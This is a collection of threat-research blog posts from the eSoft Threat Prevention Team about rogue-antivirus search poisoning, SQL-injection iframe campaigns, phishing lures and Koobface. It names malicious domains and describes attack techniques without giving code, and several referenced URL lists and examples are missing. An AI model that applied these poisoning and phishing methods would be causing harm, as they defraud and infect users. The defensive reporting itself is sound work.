Boeing 787 Searches Hijacked by Rogue AV

Today, the Boeing 787 Dreamliner jet completed its much awaited first flight. As users searched to find videos and news articles related to the story, blackhats quickly moved in for yet another attack against Google search results.

The most popular search for several hours today was “787 first flight video”. This search and related searches are saturated with malicious results leading to rogue AV and potentially other malicious payloads.

At peak hours, 5 out of the first 9 results lead to malicious payloads as users were pushed through a series of redirect pages and to different distribution points.

While the distribution points and payloads varied, their effectiveness did not. Most sites were undetected by Google Safe Browsing and the malicious payloads they delivered had very low anti-virus detection rates.

This latest attack is nothing new, but it is shocking how quickly and effectively cybercriminals are able to react to the latest news trends. In this particular attack, the dangerous top results seemed to be compromised sites with existing reputations which makes detection much more difficult.

eSoft Uncovers 1.5 Million Sites in SQL Injection Attacks

The eSoft Threat Prevention Team has uncovered an additional 1.5 million sites associated with the newest series of SQL injection attacks. Any compromised sites are very dangerous, infecting the user with Trojan.Buzus silently in the background. The Buzus family of trojans can steal passwords, financial data, and other sensitive information.

Note: Any sites listed below are dangerous and should not be followed without proper protection.

The compromised pages are injected with the same script several times in and around the title and meta tags, as well as other locations. Injected sites in this attack share the common characteristic of “script src=http” and a varying script source.

The list below shows the injected domains used in this attack. The number next to each domain is the amount of sites found to be injected with the domain using Google search.

Each domain hosts the same javascript, using small or hidden iframes to redirect users to other malicious sites where the final payload is delivered. These domains use the same technique described by Scansafe last week in the 318x injection. As many as 300,000 sites were reported compromised in that attack. An example is shown below, note each of the sites in the image is also dangerous so do not attempt to view linked sites.

Additionally, the Threat Prevention Team uncovered the related sites below, also using the same type of injection and javascript iframe technique. The javascript shown below is slightly different than the first attack, only using two iframes but infecting users and tracking with the same method.

eSoft is adding detection for these attacks and flagging any victimized sites as compromised. Distribution and redirect sites are marked as malicious, protecting users from downloading the final dangerous payload.

Fraudsters Deliver Another Round of Federal Reserve Emails

During the last week, the eSoft Threat Prevention Team has detected a number of malicious emails, allegedly from the Federal Reserve Bank. The emails warn the recipient of phishing attacks and instruct the user to follow a link for more detailed information on the threat.

The email appears to be legitimate, sporting the Federal Reserve emblem and containing a real looking domain, federalreservebank-oh.com. However, users following the link are exposed to malicious payloads, most recently the Oficla Trojan.

Similar Federal Reserve Bank scams have been around for quite some time and are often used for phishing attacks. Example URLs contained in this newest rash of emails are shown below.

 


Always be cautious in following links in emails, particularly unexpected messages. If there is any doubt, contact the sender directly to verify the legitimacy of the message. The Threat Prevention Team is flagging these URLs as malicious, protecting SiteFilter customers from this threat. 

Scareware Taints Chromium OS Searches

Yesterday, Google announced the open source project called Chromium OS, a development phase release of the Google Chrome OS. Blackhats have quickly taken advantage of this announcement, poisoning search results to spread scareware.

Attackers continue to perform Blackhat SEO attacks on Google searches, particularly trending topics. Dangerous results are returned linking the user to Rogue Anti-Virus downloads through a series of scripts and redirects.

The search terms used in this example are "chromium os download", though any combination of terms could return dangerous results. The 5th result in the search below leads to scareware.

Clicking the link takes the user through a series of redirects, ultimately ending up at the distribution point. As with most Rogue AV scams, a fake system scan is performed informing the user their system is virus laden and opening a download to remove the threat.

Even if the user attempts to cancel, the rogue installer starts to download a setup.exe file. The file has low anti-virus detection, as is common with Rogue AV scams and the user is led to believe the download is safe to install.

After a standard installation, the user is now infected with "SecureKeeper". This is a brand new variant first reported by Sunbelt just yesterday. 

 

After running another fake system scan, the software reports 736 infections and prompts the user to enter a registration key, or purchase the software. Some very scary messages are displayed, warning the user that criminals will gain access to their credit card and personal information.

 

Warnings will perpetually appear in the system tray, persuading the user to complete the purchase. For just $49.95 USD you can own this piece of malware...

This is a very typical attack that continues to happen all too often. Attackers will regularly change redirect URLs, malware distribution points and final payloads. This allows them to keep PageRank high and evade detection by anti-virus programs and web filters. The sites are further protected by checking the referring site to ensure the infected page can only be accessed from Google search results.

Raising awareness about this type of scam is one of the most effective ways to keep users safe. Other search engines are targeted less by attackers, which may make them safer for the novice user. eSoft tracks attacks on trending topics and is marking any associated sites as malicous.

Blackhats Unleash Another Fake Blog Campaign

In September, eSoft reported as many as 720,000 compromised sites hosting fake blog pages and being used to distribute rogue anti-virus programs. Many of these sites are still active and continue to plague searches with malicious results.

Earlier today, Cyveillance issued this report of a nearly identical attack with over 260,000 dangerous URLs prompting the Threat Prevention Team to revisit this threat.

Between the newly reported Cyveillance URLs and additional URLs discovered by the eSoft there are now well over 800,000 active URLs matching this pattern. Surprisingly, Google only detects a small portion of these sites as malicious.

The key to this scheme is javascript uploaded to the compromised server and used in the fake blog pages. The file, css.js, contains obfuscated javascript which redirect users to Rogue AV if the site is accessed through certain search engines.

Using this technique allows the attackers to quickly and easily change distribution points and payloads. The current payloads have low detection rates among AV scanners.

In addition to the URL strings reported by Cyveillance be on the lookout for these additional URL types.

eSoft will continue to flag associated domains into their appropriate security categories, protecting SiteFilter users from falling victim to this attack.

CoolerEmail Hit by Phishing Scam

CoolerEmail is notifying customers of a new phishing scam used to steal login credentials. The web based email marketing program carries an impressive client list including Walmart, Toyota, Pepsi and dozens of other big name brands. Any phished credentials can be used to impersonate these companies in additional phishing or malicious emails.

If you’ve been victimized by this scam change your password immediately at the CoolerEmail website.

The fraudsters use a classic phishing “hook” and present a very real looking email, complete with company letterhead. The email reports a recent software upgrade and asks users to follow a link in order to confirm their account details.

 

The disguised link suggests the user will connect directly to the cooleremail.com website. However, the link actually connects to cooleremail1.com – a domain setup by cybercriminals specifically for the phish.

Whois information shows this domain as recently registered and is not in any way affiliated with CoolerEmail.

CoolerEmail has sent out a warning notice to customers and stated that they would never ask for confirmation of account details. Always be wary of emails containing any type of link or asking to update account information. If there is any doubt, contact the sender to verify the legitimacy of the email. 

Japanese Hosting Site Compromised

The eSoft Threat Prevention Team is today warning users to be wary of sites hosted on g0oo.info, a Japanese hosting site.  At this time, all blogs and other web sites hosted by g0oo.info are compromised and currently being used to boost the Google PageRank of various sites including Japanese pornography sites in a technique sometimes called "PageRank Bombing" and also referred to as "BlackHat SEO."

At a glance, these sites look normal, but at the bottom of the page is a small portion of a box that actually holds around 300 links to questionable and pornographic websites.  The Threat Prevention Team has found thousands of unique links so far.  At any time, the g0oo.info sites could be repurposed to something more dangerous, as could the target pornography websites.

Sample URL associated with the scheme:

eSoft has now flagged thousands of these URLs as "Compromised" and/or "Pornography" as appropriate in order to protect customers and partners who use eSoft's SiteFilter database and block those categories.

Phishing Criminals Take Aim at Yahoo Ad Services

Yahoo! Marketing users are the target of a new phishing scam being detected today by the eSoft Threat Prevention Team. Webmasters receive a very believable notification that their Yahoo Marketing account has expired with a link to login and presumably reactivate the account.

If the user follows the link, they’re presented with an authentic looking login page where the phishing attack takes place. The username and password entered here are delivered to the attackers for further exploitation. With these credentials, criminals can hijack paid advertisements, replacing legitimate ads with their own malicious links or code.

The “hook” in this scam is a classic warning of impending account closure.  The domain being used to serve the phishing attack was registered only today, but has an authentic ring to it. The URLs also use a marketingsolutions.yahoo subdomain to make the URL seem more authentic.




At the time of detection, none of the major search engines or public phishing lists detected this URL as malicious.

Compromised Web Servers Host Koobface Malware Cocktail

The Koobface gang has struck again using compromised web servers to deliver a potent mix of malware. eSoft threat researchers have found hundreds of newly exploited sites hosting malware which includes downloaders, keyloggers and multiple variants of the Koobface worm.

Attackers using compromised sites to deliver their malware stand a better chance of evading web filters since those sites are generally already categorized in a "safe" category. The constant changing of the malware binaries also keeps the Anti-Virus detection rates low.

 eSoft has noted a constant stream of new malware files coming from these sites.

Koobface is a social network worm that spreads using social engineering techniques. Users will typically receive a link to an alleged video. After clicking the link, the user is prompted to update their flash player or download a codec to view the video. Users who haven't been trained to be skeptical of such requests follow the directions, infecting their machine and allowing the worm to spread through available social networks using the local users' accounts and targeting the infected users friends, family and business contacts. This social networking aspect is part of the lure of the social engineering and why its so successful. The video might require a download to view, but it came from a close friend so it is probably fine.

The keyloggers hosted on the compromised sites can be used to steal any kind of sensitive personal information. Koobface will often steal login credentials for social networking sites which it can then use to send more messages and infect more machines.

The compromised sites in this attack are in a format that looks something like this:

eSoft is flagging these sites as 'Compromised'.

Unresolved Compromised Fox Sports Host Heading Into Third Week

eSoft first detected a compromise on the Fox Sports website two weeks ago and as of today, at least one Fox Sports host continues to contain automatic links to a multitude of dangerous exploits. Even with media coverage and direct emails, this compromised host has not been taken offline or cleaned. The threats being hosted have rotated with the most recent threats being remote script links to ackworld.com and nt002.cn.

akcworld.com has been hosting a multitude of Gumblar exploited pages that are leading to dangerous trojans.

nt002.cn has been hosting a variety of exploits, most recently targeting the Microsoft Video Control ActiveX vulnerabilities.

We hope that with further attention and pressure, the Fox Sports administrators will address this problem before another week passes.